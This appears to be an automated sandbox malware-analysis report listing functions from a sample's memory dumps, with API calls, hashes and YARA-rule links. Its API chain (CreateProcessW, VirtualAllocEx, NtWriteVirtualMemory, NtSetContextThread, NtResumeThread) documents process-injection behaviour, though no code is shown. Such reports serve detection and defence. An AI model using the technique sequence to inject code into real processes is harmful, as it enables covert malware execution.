Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0ABED20F

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d3cef7cd1ec71a18a9ce44573763a858fba0649af68ca7e2bb6f84e9d6212b24
Instruction ID: b8646a379737ecc3caec19194239ffa1a0270ac8e33eb450761464a96a17db04
Opcode Fuzzy Hash: d3cef7cd1ec71a18a9ce44573763a858fba0649af68ca7e2bb6f84e9d6212b24
Instruction Fuzzy Hash: C202FE71E002698FEB24CFA8C884BDDBBB1FF49304F1481A9E818B7251D7709A85DF91

Function 0ABECDC0 Relevance: 1.9, APIs: 1, Instructions: 397
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0ABED20F

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6a63a8f8b0e240c12b8025e401533731c85050dc353348f7603ae56005668fdc
Instruction ID: 03046b9aea74fbb01ed736da044aa374ad122b3048a04362a285a8fa3fcc9138
Opcode Fuzzy Hash: 6a63a8f8b0e240c12b8025e401533731c85050dc353348f7603ae56005668fdc
Instruction Fuzzy Hash: 0C02EFB0E01228CFDB24CFA8C880B9DBBB1FF49304F1481A9E419B7250DB74A985DF55

Function 0ABEDDC9 Relevance: 1.6, APIs: 1, Instructions: 116nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0ABEDEA0

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 06017eeeda00c357bb0a6c5138a025dede593b6094162f89eb8dab52a6da0f2c
Instruction ID: b8cdb385ed6c52d771e546c21fccb7d41a6c41155dd691f520cb79ad6f230937
Opcode Fuzzy Hash: 06017eeeda00c357bb0a6c5138a025dede593b6094162f89eb8dab52a6da0f2c
Instruction Fuzzy Hash: 854199B5D012589FCF10CFA9D984AEEBBF1BB49310F24902AE814B7210C779AA46CF54

Function 0ABEDDD0 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0ABEDEA0

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 49072deb1a5b7a1d7b9ba2b7c79fdab4f37f76a43c03add4488570b5dc073ee9
Instruction ID: a66894933f4a7b7ef9e1fd145ddbb5bcce7a5ed2b2f92d7a627f4f2f8ef355ba
Opcode Fuzzy Hash: 49072deb1a5b7a1d7b9ba2b7c79fdab4f37f76a43c03add4488570b5dc073ee9
Instruction Fuzzy Hash: A641AAB5D012589FCF10CFA9D984AEEFBF1BB49310F24902AE814B7210D779AA45CF64

Function 0ABED9F0 Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0ABEDAAA

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: b0c3ac591f7917bdcdabab7d891be879078c4c6a5aaa3b742369395c3d935fbf
Instruction ID: d8d74bdb9f2d31ded1b2de4149278a8b2c62b5aad35058b1e137564d02d5d70d
Opcode Fuzzy Hash: b0c3ac591f7917bdcdabab7d891be879078c4c6a5aaa3b742369395c3d935fbf
Instruction Fuzzy Hash: 2B41BCB5D04258DFCF10CFA9D884AEEFBB1BB49310F14942AE815B7200D775A946CF64

Function 0ABED9F8 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0ABEDAAA

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 28b524ac90008a1e5816a28655802597e86d5077a09ad25659a1406ae4f83cda
Instruction ID: e5caeee86737b588d266c1ee64f255b5576ecdbbf497d878cb7872e173927d8f
Opcode Fuzzy Hash: 28b524ac90008a1e5816a28655802597e86d5077a09ad25659a1406ae4f83cda
Instruction Fuzzy Hash: 0841ABB5D04258DFCF10CFAAD880AEEFBB1BB49310F14942AE815B7210D775A945CF64

Function 0ABEDF21 Relevance: 1.6, APIs: 1, Instructions: 95nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 0ABEDFD7

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 7d4f1fb6c33d58127f1c6c40ddcf26622eb6e6c1dddabfbcf38493ae49b8d14d
Instruction ID: a9f2fe0c0fb1e74829c51adb5604d526aaaca3a9bc0e070b633a7e8fd3aaaf13
Opcode Fuzzy Hash: 7d4f1fb6c33d58127f1c6c40ddcf26622eb6e6c1dddabfbcf38493ae49b8d14d
Instruction Fuzzy Hash: 5641A9B5D012589FDB14CFAAD884AEEBBF1FF49310F24802AE415B7240C779A94ACF54

Function 0ABEDF28 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 0ABEDFD7

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 0d1ed9248c21ead9c7f334099618d729e24d20e5fa2b169e701f0c5211045174
Instruction ID: 2cadc32dc1a84f1ac766ff765c06a78f14e4524dd8f4907d5d0fafa133de38e1
Opcode Fuzzy Hash: 0d1ed9248c21ead9c7f334099618d729e24d20e5fa2b169e701f0c5211045174
Instruction Fuzzy Hash: CF31BBB5D012589FDB14DFAAD884AEEFBF1BF49310F24802AE414B7240C778A945CFA4

Function 0ABEDBA8 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0ABEDC39

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8cab46dc40e68c569a32368b284661e3878ac40045b13c5c884a22f961d111f5
Instruction ID: cbbfc392080cc565fa2d7605a6ecba21fc36741b37215f9c0c0a4add546dc2bd
Opcode Fuzzy Hash: 8cab46dc40e68c569a32368b284661e3878ac40045b13c5c884a22f961d111f5
Instruction Fuzzy Hash: F23199B5D012189FCB24CFA9D984AEEFBF1BB49310F24942AE815B7300C775A946CF54

Function 0ABEDBB0 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0ABEDC39

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d8f8e068f37b1dc34bb44b871f4812d44dccebb18069147a02ef41b16ae7ceb6
Instruction ID: f0a34256c07a117acc7ee3c33f2d2521dcef85d302b52070fea222130c33c654
Opcode Fuzzy Hash: d8f8e068f37b1dc34bb44b871f4812d44dccebb18069147a02ef41b16ae7ceb6
Instruction Fuzzy Hash: 3431A8B5D012189FCB10CFA9D980A9EFBF1BB49310F24942AE815B7300C775A946CF94

Function 0D065528 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

<, xrefs: 0D065655

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 0411af2c1f6ba5929e23acffb9cf6f3e5c49540923e67be6d00b8ab99f4f4d2a
Instruction ID: 5f408c9d9b055ea304931469f6718e28919d593d16c2012e8bc03ca42663dbe7
Opcode Fuzzy Hash: 0411af2c1f6ba5929e23acffb9cf6f3e5c49540923e67be6d00b8ab99f4f4d2a
Instruction Fuzzy Hash: 08916275E01658CFDB54CFAAC9846DDBBF2BF89301F14C1AAD409AB225D7349A81CF50

Function 02D5D038 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

LV=, xrefs: 02D5D165

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID: LV=
API String ID: 0-142187384
Opcode ID: 1324ee208615ed76f35f29209b28b3560c379d78c486bbfbf767f0fe27988c10
Instruction ID: 2f647115790d8ddb941a96e1cef3e9f35067e7ec3fe87e3ae1ce2f52e513be54
Opcode Fuzzy Hash: 1324ee208615ed76f35f29209b28b3560c379d78c486bbfbf767f0fe27988c10
Instruction Fuzzy Hash: 5771B2B4E01219DFDB08CFE5D884AAEFBB2FB88301F14812AD919AB358D7745945CF50

Function 0D067918 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

&[, xrefs: 0D0679E3

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: &[
API String ID: 0-1761963930
Opcode ID: b3e238d9b70f2790ad5426a025d475a91efc3f8df77cbaf908be1dc5f572f6fe
Instruction ID: aa05ffff380093604fc93c2fb42240cb0fab29d789c6e53dd012ee246e7748b4
Opcode Fuzzy Hash: b3e238d9b70f2790ad5426a025d475a91efc3f8df77cbaf908be1dc5f572f6fe
Instruction Fuzzy Hash: 73512C70E0420A8FEB08CFA5D5406AEFBF2BFC8304F14D56AD559A7254D3749A01CFA4

Function 02D56F28 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

, xrefs: 02D56FAD

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: fa84b6f4905cb41abb4c3fae39c747d643dafbcb3f136f15df3c8daf2ba51cec
Instruction ID: baa781092751aed0c9fef2cb1456465e710bf925dfb370961fa2ca15c58266d2
Opcode Fuzzy Hash: fa84b6f4905cb41abb4c3fae39c747d643dafbcb3f136f15df3c8daf2ba51cec
Instruction Fuzzy Hash: FA219771E046189BEB58CF6BD84479EFBF7ABC9200F14C1BAC818A6268EB744945CF51

Function 02D5B978 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7b68939d2d45732a2585b9bcad986cf7c436acb38be7e44ba03ff584537ee1
Instruction ID: c24dddaa19e13e9034e7ce47cf8468c43b0f30d5692b74dca0bcadbbf899403b
Opcode Fuzzy Hash: 7a7b68939d2d45732a2585b9bcad986cf7c436acb38be7e44ba03ff584537ee1
Instruction Fuzzy Hash: 04A1E774E00218DFDB54DFA9D584AADBBF2FF88305F24816AE815AB368DB709941CF50

Function 02D579C2 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188228a9a8b75b8e5c88add0f6793716a453c2149c8a5ec7e6a41ca0659db86e
Instruction ID: 14f4e8c10e38932a360522bb19ac5c1310ff219251de0a4756e2cced4610e714
Opcode Fuzzy Hash: 188228a9a8b75b8e5c88add0f6793716a453c2149c8a5ec7e6a41ca0659db86e
Instruction Fuzzy Hash: B5817FB1D046948BEF59CF668C54399FBF3AFD9210F18C1EAC84C56226E7710A46CF51

Function 0ABE2637 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f665d405a227a3559adc94c62bd7d77c217260249d01d8afa84cc163d8f775b
Instruction ID: 5d3114c3466b7c475a0e026733b5c7346bc61ae7805af0c745bac59df4f845c8
Opcode Fuzzy Hash: 4f665d405a227a3559adc94c62bd7d77c217260249d01d8afa84cc163d8f775b
Instruction Fuzzy Hash: E691C274E012589FDB18CFA6D984ADDFBF6BF88300F24956AD80AAB354DB709905CF14

Function 02D52D20 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e91a194f17375c9a6aa7eede62b1d67d1a1824a5843403a406f0118b1b23b304
Instruction ID: 156901752fe3d7d3cc753311d3b5892e094971c25111d874651f91ceb3beff4a
Opcode Fuzzy Hash: e91a194f17375c9a6aa7eede62b1d67d1a1824a5843403a406f0118b1b23b304
Instruction Fuzzy Hash: AE512971E0421A8FCB48CFAAD4446AEFBF2EF89300F14D46AD819A7354D3749A45CF94

Function 0ABE0B88 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6371f8bc0a5230492cb3968283b1add070f073b0088f258360bab690092c867d
Instruction ID: 9a396e0e708d36dd917808c6f9f231f127a41934444b06fd20dd28bf7511e294
Opcode Fuzzy Hash: 6371f8bc0a5230492cb3968283b1add070f073b0088f258360bab690092c867d
Instruction Fuzzy Hash: 2D616A70D44309EFCB58EFA6E0886AEBBB1FF89301F109469D416B7254D7B48942DF50

Function 0ABE0B78 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d55567ec6976cd33b65de96884384de5c878809f0f41975fa730105c917659
Instruction ID: ffb18214783ca9fcf84572a01a1225da5d545b00a6a068417382b5bf096dde96
Opcode Fuzzy Hash: c0d55567ec6976cd33b65de96884384de5c878809f0f41975fa730105c917659
Instruction Fuzzy Hash: BE518C70D44209EFCB58DFB6E4886AEBBB1FF89301F1084AAD416B7254D7B88942DF50

Function 0ABEE08F Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74286d5ce75a2629f025daa2c339bf64dec32ca67ca32120108a2bef2b198523
Instruction ID: 4b20eaac91fedd096baa729852411c62e70362e3d11e5518b95f813079d8a27f
Opcode Fuzzy Hash: 74286d5ce75a2629f025daa2c339bf64dec32ca67ca32120108a2bef2b198523
Instruction Fuzzy Hash: 1551B674E012289FDB68CF6AC8446D9F7B6EF89310F14C1EAD50DA7214DB319E869F50

Function 0D068393 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91471ce7662ee105f8ff7d2b49c3a424e39155b7f0e03ed232043eff4a50214
Instruction ID: 9bf019b56043fc69b7d6eb4e66556b7ba1de38629be9be0f00df75ddeffbf01a
Opcode Fuzzy Hash: a91471ce7662ee105f8ff7d2b49c3a424e39155b7f0e03ed232043eff4a50214
Instruction Fuzzy Hash: 2F31FA71E006588BDB18CFA7D8546DEBBF3AFC9310F14C1AAD409AB268DB344A45CF50

Function 02D53760 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e2d93b89f27f219ba3ca238089b95d09b49b8930e50530d53a85f26f99ead2
Instruction ID: 51259b4725338570bdd2129a94111cb3a26093725df94d1300c5cfab463b99bc
Opcode Fuzzy Hash: 10e2d93b89f27f219ba3ca238089b95d09b49b8930e50530d53a85f26f99ead2
Instruction Fuzzy Hash: A121D5B5E006588BEB58CFAAD84439EBBB3AFC9310F14C16AD408A6258DB741A498F51

Function 0D069920 Relevance: 2.6, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

yl9], xrefs: 0D0699B0
@Vh:, xrefs: 0D0699CC

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: @Vh:$yl9]
API String ID: 0-3465494468
Opcode ID: a9a39b58fed491f83eefe5c56aa2268edc518b87bfb8ebe67a842fa18eaf6da6
Instruction ID: d75fc44a3b8b57c221b1671eb530718256c930f6a7c71397bcf7516c904612de
Opcode Fuzzy Hash: a9a39b58fed491f83eefe5c56aa2268edc518b87bfb8ebe67a842fa18eaf6da6
Instruction Fuzzy Hash: 05313C70D15209DFDB44CFAAE5806AEFBF2AF89300F24C5AAD009E7255D7748A41CF61

Function 02D51711 Relevance: 1.7, APIs: 1, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D51877

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1143510d353dc20c24f8410d8a77f29e7219e252c082e7e395bf6f9956034188
Instruction ID: dced5c3170ae76eded588e6928f8b3f2115e5b559e4a97ef2d35ae70df9501ee
Opcode Fuzzy Hash: 1143510d353dc20c24f8410d8a77f29e7219e252c082e7e395bf6f9956034188
Instruction Fuzzy Hash: 9951C9B5C042589FCB01CFA8D891ADDFFB1FF4A320F18825AE848A7211D7759A4ACF50

Function 0ABEDCA8 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0ABEDD5A

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c4ba1560d3211795c0064c6a6bde60fb38474263c5f458ac66f08558ee01e884
Instruction ID: dbd754a2b6baf05ea5f978612a70e4858518ba568d02ab7980ae69fa31f09fb5
Opcode Fuzzy Hash: c4ba1560d3211795c0064c6a6bde60fb38474263c5f458ac66f08558ee01e884
Instruction Fuzzy Hash: A641A8B9D002589FCF10CFA9D880AEEFBB1FB49310F20902AE824B7210D775A946CF54

Function 0ABEDCB0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0ABEDD5A

Memory Dump Source

Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_abe0000_screens.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: efc733cdfeae47da7fe8c9c82ab2bb38bbfb2b4726c6ccc27a277033ebcd17e2
Instruction ID: 6db60552c0fcc855eafa11b7312d29de38f2507774dd330c4c5f7def5eff17b4
Opcode Fuzzy Hash: efc733cdfeae47da7fe8c9c82ab2bb38bbfb2b4726c6ccc27a277033ebcd17e2
Instruction Fuzzy Hash: A93197B9D002589FCF10CFA9D880ADEFBB1FB49310F10902AE824B7210D775A956CF68

Function 02D5A2B0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D5A357

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e6afcb20665961875eff943a903c83507e631e4c9303bb2ab4a211433925df82
Instruction ID: 9ab157b1f6b7ab3ad458ee767b16a69370f189b376fa76e094b73911bbf9c0ab
Opcode Fuzzy Hash: e6afcb20665961875eff943a903c83507e631e4c9303bb2ab4a211433925df82
Instruction Fuzzy Hash: 863177B9D042589FCF10CFAAE584ADEFBB1BB09310F24902AE864B7310D775A945CF64

Function 02D517D0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D51877

Memory Dump Source

Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d50000_screens.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1b5f25d76ba33231a8a08786c89c9bc377cc1ba3002ae80d3a3e5ea2d6449d89
Instruction ID: e1366514d461749d659ef96e54c419e55df67ab47ee201f0fb47d803a1e5b87b
Opcode Fuzzy Hash: 1b5f25d76ba33231a8a08786c89c9bc377cc1ba3002ae80d3a3e5ea2d6449d89
Instruction Fuzzy Hash: BF3179B9D042589FCF10CFA9D584ADEFBB5BB19310F24902AE818B7310D775A945CF64

Function 0AEA03E2 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

,, xrefs: 0AEA03EE

Memory Dump Source

Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aea0000_screens.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 4ea2c32b6756a222f0034831bc5d8d28f4be2a4fa103860d68edbae14e31650c
Instruction ID: 112782b9b4a514d844803d8e44181c017c4f54eb3f8a242b39c5835d70392c79
Opcode Fuzzy Hash: 4ea2c32b6756a222f0034831bc5d8d28f4be2a4fa103860d68edbae14e31650c
Instruction Fuzzy Hash: FF21B3B49402299FDB60DF68D9847D9B7B6BB68300F1081D69549A7350DB70AEC08F54

Function 0D065453 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

r>, xrefs: 0D06549E

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: r>
API String ID: 0-2908804962
Opcode ID: 7c1dc26166c24cab7d9144f08cd616827fab483f867bf0c0c29c385708205a15
Instruction ID: 6e221b6452a20ca648a6ef8fed0778223cab81f98055b49d6302c46ffc5e4ba2
Opcode Fuzzy Hash: 7c1dc26166c24cab7d9144f08cd616827fab483f867bf0c0c29c385708205a15
Instruction Fuzzy Hash: 26114C70A19244DFC755DFB4E98D1ADBFB1FF8A206F24C4EAD109D3268D6308946CB10

Function 0D065470 Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

r>, xrefs: 0D06549E

Memory Dump Source

Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d060000_screens.jbxd

Similarity

API ID:
String ID: r>
API String ID: 0-2908804962
Opcode ID: 64a796dfa64a9ae311a7a11601cd68e8d901b590d6c698e7820e9541a07ea2d8
Instruction ID: 9c45a4d252877786f0bae15ccc8723fea4d349722b77e246d50a8488b507c808
Opcode Fuzzy Hash: 64a796dfa64a9ae311a7a11601cd68e8d901b590d6c698e7820e9541a07ea2d8
Instruction Fuzzy Hash: 42018070A05204EFD754DFB5E98C55DBBF6FB89206F20C4A5D40DD2258E7308A058B10

Function 0AEA0E24 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

LRq, xrefs: 0AEA0E24

Memory Dump Source

Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aea0000_screens.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 6bbe563d22e11013d1abf9b0bbb9cd350e2d0a4da3b802538f6faed5bce9b5cf
Instruction ID: 6059534d43074122683927bcd379550f4af5e449e05a3f55fb3ab7ac5650faa8
Opcode Fuzzy Hash: 6bbe563d22e11013d1abf9b0bbb9cd350e2d0a4da3b802538f6faed5bce9b5cf
Instruction Fuzzy Hash: B7F01F30A00119EFDF24DFA2DD50AECBB76BF85300F2091AAA508B7254DA305E969F10

Function 0AEA1240 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_aea0000_screens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8000c09616715c2a1a830e4e440eac847d952469dc06142d2164de14a6fcf80c
Instruction ID: 3b72dfe110bde08e9e3e57867aae88eb4605ecb8ecf5e24772dd2b5db90bcd23
Opcode Fuzzy Hash: 8000c09616715c2a1a830e4e440eac847d952469dc06142d2164de14a6fcf80c
